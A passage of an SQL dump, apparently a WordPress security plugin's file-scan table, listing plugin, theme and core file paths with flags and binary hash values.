\0L]sD','wp-includes/assets/script-loader-react-refresh-runtime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f\ZZ�BH�=?3!R','��wW�k���(\0LJ��m�����؟\\g4','',0,'?'),('h�tmLOQ�w�2�pRS<','wp-content/plugins/wp-smushit/app/views/cdn/disabled-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5Ћ�[�}r����','�x� ����z��°?2ս{�]��6s˯��x','',0,'?'),('h��~cTOo�y4|','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),('h�M�V�m� ����','wp-includes/blocks/categories/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{:\Zn	Yi�!�@�\'�-�','!G1І� d��zG�|(}��w*=�>U�tU','',0,'?'),('h�<�]���OpNCƴ�','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�{�C-���.����','5%��꒛�⁚�d�*<nԗ�ҜN�Z��z�','',0,'?'),('h��]n,�����m:��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']G�.v�Rz','�%���^�@��q@ufɺ6���uH�.j˓J','',0,'?'),('h�.α�D4$�Gv��lC','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-htaccess.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �҅XFN#�L����','�:�3t��ſq//G���v���x�{l�','',0,'?'),('hܡ&�l\rzQ�G�f�','wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c7�S��KQ��','��HS{���&�:��.��Tbɣ�埒��} �:','',0,'?'),('h���A_��q�w�T��','wp-includes/wp-includes/class-wp-user-meta-session-tokens.php',0,'�8/\'\0�\0��vSL-G\0','�8/\'\0�\0��vSL-G\0','����8�b�YB&?�6��o���>','',0,'?'),('h���QK�V<r:Mg_��','wp-includes/js/dist/format-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d��d��hL���',',I���9��� l	��&�i�\rB��7 �','',0,'?'),('i	�?N��ZaiBi*�','wp-includes/wp-includes/js/mediaelement/wp-mediaelement.js',0,'�(D�q�|�����','�(D�q�|�����','P�E+#��M�s;agL���e��S�MN��r=','',0,'?'),('i����kmCx�ʷ��','wp-content/plugins/wordfence/lib/wfDashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��.��q�:�j��R','u�a�v�R���+We\r�T�J%�\"�\r7�f���','',0,'?'),('i6oV�5��1�,n�','wp-content/plugins/wordpress-seo/src/config/migrations/20200429105310_TruncateIndexableTables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','媆�\"�LW��ǔ\\�',';	��Q;A0�шS�=�PG��<�ʔ�sڠ��','',0,'?'),('i��{��pW\r��9�/�','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-settings-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��w7e��D�:�_.�','8>����p�J�?滍$�����k�nR','',0,'?'),('ij5�;�A���w��','wp-content/plugins/wp-cerber/assets/flags/at.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wC��J(�7|�|/�r','A����	R��VY�j�:��L�u	��`<�5�','',0,'?'),('i��;�&��o�?','wp-includes/IXR/class-IXR-base64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*6���D�T�e��','?F]L�2}���\rS�@b�2�O�o�uU\'O��','',0,'?'),('i(��	�0t7�@�Q�@','wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-bad-request-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$v�)W���ؔ�E��','X���_<X�Knm�_���&��K$E3S�','',0,'?'),('i3�|�	JP���*�','wp-content/plugins/wordpress-seo/src/conditionals/development-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɋ3 3�G�.�7��1','y6U������t�ĒfDk�w�+т_G�naB','',0,'?'),('i4�^v�zs�n�\Z�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-difficulty-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rڦ�+޲`Ovh','�p_J�9��]3!\r\'?�Ja)�t1E_�������','',0,'?'),('i=�����rs�ك$','wp-content/plugins/wp-cerber/assets/flags/bv.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']̧%W?,OS�c�rs�','�޶#��` CUꦭ���W�5M�p1�\Ze\r���','',0,'?'),('iG\Z�2*��nt��PH�','wp-content/plugins/wordfence/js/jquery.colorbox-min.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y5�=��q��)����','H��4\\��v��/X�G��K����:gkl','',0,'?'),('ia{�-��\Z�ؙo��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�<��܎�s��9','��Q�\'�r�� �t7��=s*a`<�z�o�_','',0,'?'),('idܶ�1�\"���^�','wp-includes/blocks/separator/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�|P��0�c�`��8','����c�S^?�u���Ny�TE��׈���','',0,'?'),('ii�\"o�C����`','wp-includes/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),('itr�<\'����;�','wp-content/plugins/wp-cerber/languages/wp-cerber-vi.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0h�\0{.AS����D#�','xLn�O��A��f�\\��KM\rH�@�H����','',0,'?'),('i�X~�Ҟl�� )��','wp-content/plugins/wp-cerber/assets/fonts/cerber.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IW\n�a1�m-6>���','�a��{R�Ԉ���r��ɿ��=n�5�[�:bc','',0,'?'),('i�g�W&_B~�\r�Ȟ','wp-includes/wp-includes/js/swfupload/swfupload.js',0,'��#����9��>&YRg','��#����9��>&YRg','��ݙ���R�YY-�ҕ�&qW1(�K��','',0,'?'),('i��\'��S�j�U��','wp-content/plugins/wp-cerber/assets/flags/in.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�*��]~ŀ��','�g�Z�J7���]��.��6�&N��Ϭp�','',0,'?'),('i�;+����O�s�ֿ','wp-content/plugins/wordpress-seo/src/conditionals/import-tool-selected-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_I�&(�iW�[�0��|','/\Z�4���+٭����\"�~�#q�3U�ԗ{�\'�','',0,'?'),('i�-��X�8V[~E�','wp-admin/css/install-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����^��P!�-�n�l','|^r᪗��јD �^[h�5���X�u','',0,'?'),('i�*7�g/�d��*st3','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�րF_�!Rb�_m','ԕ�}��K��7�[�Q��5�gU�#��gI','',0,'?'),('i�\\����=X�h$','wp-admin/js/language-chooser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӥ�ku��lLS�','��r4��i���j�\"܈�����6���&','',0,'?'),('i�k���C��T,�','wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�h��2aE��0','�D�:�]踝z����w%[�j�o����X`�','',0,'?'),('i�cL��J}��ͧ1�','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Data/Kanji.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$���$9�zi�1�7�','���7�D���\06�_K�%$���z�\n*�','',0,'?'),('i�m�rO��:zi|','wp-includes/wp-includes/js/crop/marqueeHoriz.gif',0,'�̮����;���Lo\n','�̮����;���Lo\n','|���S�e��|.���/�Q�Y��W�}(','',0,'?'),('i�rHFn���A\n�AS�=','wp-content/plugins/wp-cerber/assets/select2/dist/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�AO���K��o�t�','�������lN_-�\n��|\r蒝vy�$k','',0,'?'),('j�S����^p N	�','wp-content/plugins/wordpress-seo/src/generators/schema-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zc�(��G�ʉ~��','yz<;�ӈk^$����4�+TM�u��g��S','',0,'?'),('j&�V1���6�4����','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r��9 �#��{�','ᄆ��n�ѿ�0c~N��r��Au�g~Δ���I','',0,'?'),('j)^��@��\'��[','wp-includes/wp-includes/js/tinymce/plugins/media/plugin.js',0,'�#@,�4dG��M','�#@,�4dG��M','XHx����0�֍X�\Z���OG��|�{�F2','',0,'?'),('j*�\Z@�����w��','wp-content/plugins/wordpress-seo/src/helpers/date-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�	+{R\\Knl/N�P','�9�qm_���D�Ie�岺R6˓�h`��Ϲ�','',0,'?'),('j+f��	��.��','wp-includes/wp-includes/sodium_compat/src/Core/HChaCha20.php',0,'[Rz@�MMQmr���','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),('j+��\0,�_/H���I','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',0,'��V�A�ݲ�1 \"�Q�','��V�A�ݲ�1 \"�Q�','J� �%�D��_su4vs��NB=�c��','',0,'?'),('j;���_�=�\Z����','wp-includes/blocks/group/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Q�% �K��ΰ�',')^����Ҋ@о�Xi��7��h�X�]�SE�','',0,'?'),('jF���Yjc�\"�y�','wp-content/plugins/redirection/locale/redirection-es_EC.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�9�K������2�','Y����s��n�|H�ŏ�P�Vzu�b�u','',0,'?'),('jM|��<��BSf�6�','wp-content/plugins/wp-cerber/assets/flags/bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�908��L��[�h','���nc\04�X���/ڃ�-	����D`YB��','',0,'?'),('jQ���e���;�e','wp-includes/css/wp-pointer-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>\r��@�o��4��R','Hף��m|oC4�U\\;uP�6�u�0��\n��l','',0,'?'),('ja\n�Lf���<~�!�{','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/css/select2.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.���e	Z�\n,�	S','���:,�UM��8|[�rV���=<*d0�I��','',0,'?'),('jgX�x�rTs���Ƥ�','wp-includes/blocks/comments-pagination/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xY?=0��,w�F�','�S5��eP���~���3���Dz���S�JV2','',0,'?'),('jmE��AX�uw�>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+���/?\r�ⷩ<q','[YL�\n��ם�k��ȿ�~3�0\n\n�_\\���','',0,'?'),('jo�x���;�<\r}���','wp-content/themes/hitmag/inc/kirki/modules/webfonts/webfont-names.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��7G��)[Q��k7','��\r�04���Q/[���֦Ѝq\\\\L���','',0,'?'),('jt��Z��ܿ�,��','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����a�a��i','{J�L���ͻ&��{��{��T:������B','',0,'?'),('j�䱋����%���]�','wp-includes/class-wp-xmlrpc-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\'���1F_>6/','�.DS�X������k���X+zV2L��b�3��','',0,'?'),('j����p�\0Z��','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Z�xu�t�\n��x�','��p!ŗ$�����<�#|j��f�#�-z�','',0,'?'),('j���)n�Q8ޮ�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�t0�,06���<��','�Q#f���9�;�8��*B�3�W�ao3Fc�','',0,'?'),('j����5F+���o','wp-includes/images/crystal/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�m`��`�9��','$����멘<x1��Փ��IR�V-VZ\\jg.���','',0,'?'),('j�B����\Z��q�','wp-content/plugins/wordpress-seo/js/dist/quick-edit-handler.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?;�_��V�:[��U_','�㟿�z51N����h�揈�, �~�j	�','',0,'?'),('j� �i4�A����L,','wp-includes/wp-includes/js/dist/editor.min.js',0,'ũ8��6uj(X4ѨÎ�','ũ8��6uj(X4ѨÎ�','������U:W�{\n�b)SN��.=}c�A','',0,'?'),('j��4-�O Մ��rL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$1�D�\'w��m���','E&&\n��a���~�b+\Z���)j��M�p��M�','',0,'?'),('j�gs�66�$��8*�E�','wp-includes/class-wp-dependency.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R��پs��8B','���ΧR�o�(GZ����E�k{�İi\\��','',0,'?'),('j�d�CT[^�R���','wp-includes/block-patterns/query-large-title-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q��$4�-�1�e�',',���Ch1z`�q������\\2ߑ���{]','',0,'?'),('j��A �G!\\�\Z*1�D','wp-content/plugins/wp-cerber/assets/flags/gi.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���F�T~�_I���a','�G���\"���}�\0|u��Q,�Vgt�\n�\rܧ','',0,'?'),('k�V:o��\0�\n��a�Q','wp-content/plugins/disable-gutenberg/languages/disable-gutenberg.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�t2�̟��98�','�J�;맙�\0�&�}�������}[��d\\\"','',0,'?'),('k���$6O��-N�x�','wp-includes/js/tinymce/plugins/charmap/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=B�쟄��P\rL��','•�x[�G��-�90b.z�G��az�>�r','',0,'?'),('k#lYݗ;���t;\r+�','wp-content/plugins/wordpress-seo/src/conditionals/non-multisite-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�\r��[�e�}\rި�','�A�]Ѣl�U�qỲ��Z�_��@�����01�','',0,'?'),('k%�\r0̯�IN6�D\'�y','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�+�ک�d�ݬ@��','w�bj�Y����S����tc��� ��I��dQ','',0,'?'),('k)��Ia��A���C<�','wp-content/themes/twentytwentythree/styles/aubergine.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��#�����|��u','ҡIY�II|�32���aƸ2]�.�]�=��','',0,'?'),('k6���*���H�	�u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�,d\\	��Ta;�R','��7�#�}5V�\0\\��\ZO?v?����Aԍ','',0,'?'),('k?.V�(���G�J��','wp-includes/wp-includes/images/icon-pointer-flag-2x.png',0,'���2�b��&�Z�r','���2�b��&�Z�r','4���Bȥ��\'x+c�h�ҠVn�5�I�>�j��','',0,'?'),('kE��n�fϋߟ�\'qb','wp-includes/blocks/video/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(�}\"y�����)��','�5���@����^��l�\r�!\ZK�� r','',0,'?'),('kM������̙Ysp','wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��s�,�\Z�*���7','h����GȆ1QC�q�M��Ѽ�`�P_�~���O','',0,'?'),('k\\pq�8�Jc�\r>','wp-content/plugins/wordpress-seo/src/config/conflicting-plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s`�7.%��.��=3','�5�R<ptl��0L�<b�~�g���`\0�','',0,'?'),('k`\n>(���׭�I��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/CurlHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Zw��r��k�^��','O%�W�Af0aQ���C\r�\n�Ʋ���','',0,'?'),('kg�@H�]u7o5!\0N�&','wp-content/plugins/wordpress-seo/js/dist/settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�PU�^�\n�0���(ls','N%+���=ut��<�>��s�@0LX�Dd�.','',0,'?'),('km�|��Kma0�\"*�k','wp-admin/js/tags-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�R�M\0���\r�R��','K�u}��QYu����[�>&c��<k�Suk','',0,'?'),('kxGhCU�)�}j�ҠB�','wp-content/plugins/wordfence/js/knockout-3.5.1.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��aUHw˲I��O','����&�$�z��;o,��4�ca����','',0,'?'),('k}:����VN����G','wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x>P��H�e6�[GF�5�','��q!�홐��%ހP٧��H��r�.�L��~','',0,'?'),('k��1���/�͓ݐ%=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dq�d6�+\"��U���','�I����s;֮����i����k���E�@�)','',0,'?'),('k��x\"�m�x?���dO','wp-content/plugins/redirection/database/schema/216.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0e\rI�Z�1�&�#�','�@���t�3\"�%z&7!(�S#k/@��-1��R�h','',0,'?'),('k�������_.�.','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/hi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')������u�\"����','	Ҥ��q�����/��?���j�ƛ���\'�','',0,'?'),('k���\Z\0x/�Yݤ��','wp-content/plugins/wordfence/css/wf-adminbar.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���\"�TU%���N�~','��G\\��ZA�(rI�T.1�q<I��\r�	�Q','',0,'?'),('k�و;�}�cL`t܌','wp-includes/wp-includes/js/wp-backbone.min.js',0,'�K�/�����7���b','�K�/�����7���b','���9J7�A���G���uq!@/nS]�<o�e�}�','',0,'?'),('k�x�r�,j��i���(','wp-content/plugins/wordpress-seo/admin/class-asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2���F�7��I','��/�\0�_��>�X�O�$\\�^v!�V��*�a','',0,'?'),('k��B˞�b=y��','wp-includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�N(�0+�cW;({','�Oh�K���,5��_�������o�Q��c�6�','',0,'?'),('k�a�J\Z���\\D.��P','wp-content/plugins/wordpress-seo/admin/roles/class-register-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɏ3��I�!�BW�ڧ','}*0�5�-�Q�̡�p�`ˣ���rP�a','',0,'?'),('k“��U/�^���� ','wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��֟0}_���','�O�+�WE��(\Zvl�%`���¢�x�6��n� ','',0,'?'),('k�� h�ѻ<x�j','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-null-tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�|\'��0�]���','�T!K���-�+[j��je\"a���1��Lг�i','',0,'?'),('kީ_�#��r\"��1�G�','wp-content/themes/hitmag/template-magazine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���x=*oż�','?P�������5���^�����\"U?�\0�f���H','',0,'?'),('k�\'\n+&=��n`�3�','wp-includes/js/dist/dom-ready.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��5�[�^|(	~�','���J�ϗ.�/�8��;1n�mv�:�\'I��','',0,'?'),('k������^m�\\���','wp-includes/blocks/navigation-link/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b,t��P)x禴(�','6&D�~�<&%���zU��B�s$H�[��?\n�e�','',0,'?'),('k�1�~�R�xOj���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`�EX����4','��Hiv�{;�n�\\�~�Ѳ�R�n�e���^��','',0,'?'),('k����@)i�|.��$�','wp-includes/wp-includes/js/tinymce/skins/lightgray/img/object.gif',0,'�rdP�E}u\n/M�A�� ','�rdP�E}u\n/M�A�� ','��#;!��I��.�>�uʍ�SV��m{|�e-','',0,'?'),('k�����v#�O���','wp-content/plugins/wordpress-seo/src/deprecated/admin/extensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�\'���>=jd','�C�A�*f�Ɂvn��̣\r\n���\n^��','',0,'?'),('l�8�Q���&m�}�Yp','wp-content/themes/hitmag/inc/kirki/assets/images/3cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9SJ|�,�!>B*�','���ܜ5�o�\r̈́3���Еe���&O � }�','',0,'?'),('ltvZ��x�]BWh*','wp-includes/wp-includes/js/jquery/ui/draggable.js',0,'��:2��g9�tL�D�','��:2��g9�tL�D�','��Cu�o.t�?�xd�x�CK�6�Ηp_�','',0,'?'),('l	�.�G�h��','wp-content/plugins/wordpress-seo/src/memoizers/presentation-memoizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��xxO9{H�=9�^��','}�Ӎ��YYY��F�P�_+\r�41(3�߫�B','',0,'?'),('l%w0i2�a?Yc)B�','wp-content/plugins/wp-cerber/assets/flags/nz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��z������','�P��{��\Zq��R-K�G�ooǐ�ztT����C','',0,'?'),('l/\n�Ԁ�W�ͱ-c�','wp-includes/widgets/class-wp-widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I%*��1��9���','u��כw��x�mI�{��c�u�l��','',0,'?'),('l0�:D�a/L�7��a�;','wp-includes/js/dist/preferences-persistence.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iN�n�I��r	','���/��P�,�\"q)�r3��\Z<��|�u�','',0,'?'),('l2���SM�/��A��','wp-content/plugins/wp-cerber/languages/wp-cerber-sr_RS.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�h\r�\"�^i]9)q','E[ٔ��o����9�.��Q�L�\"�������3','',0,'?'),('l9��=��h�,>���&','wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X��s?����˟�g','?`�y�R�ե��`Uʙ��Zdž�f��s��b�sO�','',0,'?'),('l;\\F�v_�-x\\3{�','wp-content/plugins/wordpress-seo/src/routes/wincher-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�l�7D�ź��d��','��ێj�)�����0�)�(������S�v*','',0,'?'),('lD�#S��Sxr�','wp-content/plugins/wordpress-seo/js/dist/classic-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{ˑ�|�r���d','�9����)�W/�w��by�lB4�{�؄','',0,'?'),('lP��Ŝ<O���u�','wp-content/plugins/disable-gutenberg/css/settings.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�I���e;r��[�','F���+�Bߟ���YR��a�K�tg�m�0bR','',0,'?'),('lZ�q�#eS%s��7Y�','wp-includes/js/dist/notices.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B��[��6��܁Nэ','h��J���F0Ѻm;ۙ[�_@�\r,���Q�p�6X','',0,'?'),('lt��%��L���Մp','wp-content/plugins/wordpress-seo/images/question-mark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|i���)d�pOd(','I�KLl\r�Ҧߐ��	S��ʨre4>bI�]','',0,'?'),('l�RM��۳�zt^��o','wp-includes/js/dist/preferences.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���t��ʭ��u`','�{mSH��c\Z\'�2��&�T��V�����t�','',0,'?'),('l�����w��_�x{?','wp-includes/wp-includes/customize/class-wp-customize-cropped-image-control.php',0,'G�p[�q}y��1�','G�p[�q}y��1�','�x\r:����}��gR)�`�����k�M%','',0,'?'),('l�Y��Ӽ�\0tH�!�r','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�u�?m�\0W��-6�	','��&3m��8`l*}�\"����M��O*�T-�','',0,'?'),('l�[ڭj�<�}S>�8��','wp-content/plugins/wordpress-seo/src/builders/indexable-hierarchy-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h)�x�\"�#�`�3a��','Su��柆�y�\'UX��j_YֻqmA���uK�','',0,'?'),('l��SNVng��y�<','wp-includes/blocks/image/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';\n�U�A�τfx���8','_�c}�0�KC�,w.2U�W{����t�/��','',0,'?'),('l��<��#��q�,�','wp-includes/blocks/archives/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��۹\n�\'}��l�U�M\0','pJc�B���`oB9�������\Z�:��y��','',0,'?'),('l��h����m�\\�{�','wp-includes/wp-includes/js/dist/core-data.min.js',0,'Th�;��ͯ�|!fE�\"\n','Th�;��ͯ�|!fE�\"\n','��(��o{il�A���	\'�Z�E�I�d/&�','',0,'?'),('l�P�\ZC�;\0\\a���','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/css/selectWoo.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.���e	Z�\n,�	S','���:,�UM��8|[�rV���=<*d0�I��','',0,'?'),('l�4�ݨHqʺt���ݖ','wp-includes/wp-includes/js/dist/list-reusable-blocks.js',0,'^��\'}�w����0b','^��\'}�w����0b','��\\o�U0.RoIOqe?�~�`ٰ�E�i�.','',0,'?'),('l�m(f�_q�`b�C�%t','wp-content/plugins/wordpress-seo/src/presentations/indexable-static-posts-page-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#��ZB*�_�h','\n up=�V��yP����y-����l,�(��','',0,'?'),('l��14��&y�a��W','wp-includes/css/dist/customize-widgets/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��)Oq$�;f�f�','F��tͱ�O�����j%3*����R�J�nr�','',0,'?'),('l�B\"|����[*\\#GG�','wp-content/plugins/wordpress-seo/css/dist/edit-page-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɘf�����e�\\8','���Rq ��=��o��Mt��I��X,_','',0,'?'),('l�Ŕ7��������','wp-content/themes/twentytwentythree/theme.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�D��_�Tss\"��','��\n��(�p~z���F��Ӌi_,쳺[���{','',0,'?'),('m)\r����aH���E�','wp-includes/blocks/social-links/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�C���ӂ�\Z,','�S�/�w�=���6c)�\r���7��D\Z�','',0,'?'),('mD��T�ms���A�}','wp-includes/certificates/ca-bundle.crt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UC%Pʅ�$��p���','�<eN����f�FK�F���o�-�Y����SlU�','',0,'?'),('m�߄@M��:����','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/Exception/InvalidGrantException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�����8��p�^Z','�\ZZ�v��Ѣ��3kw��9�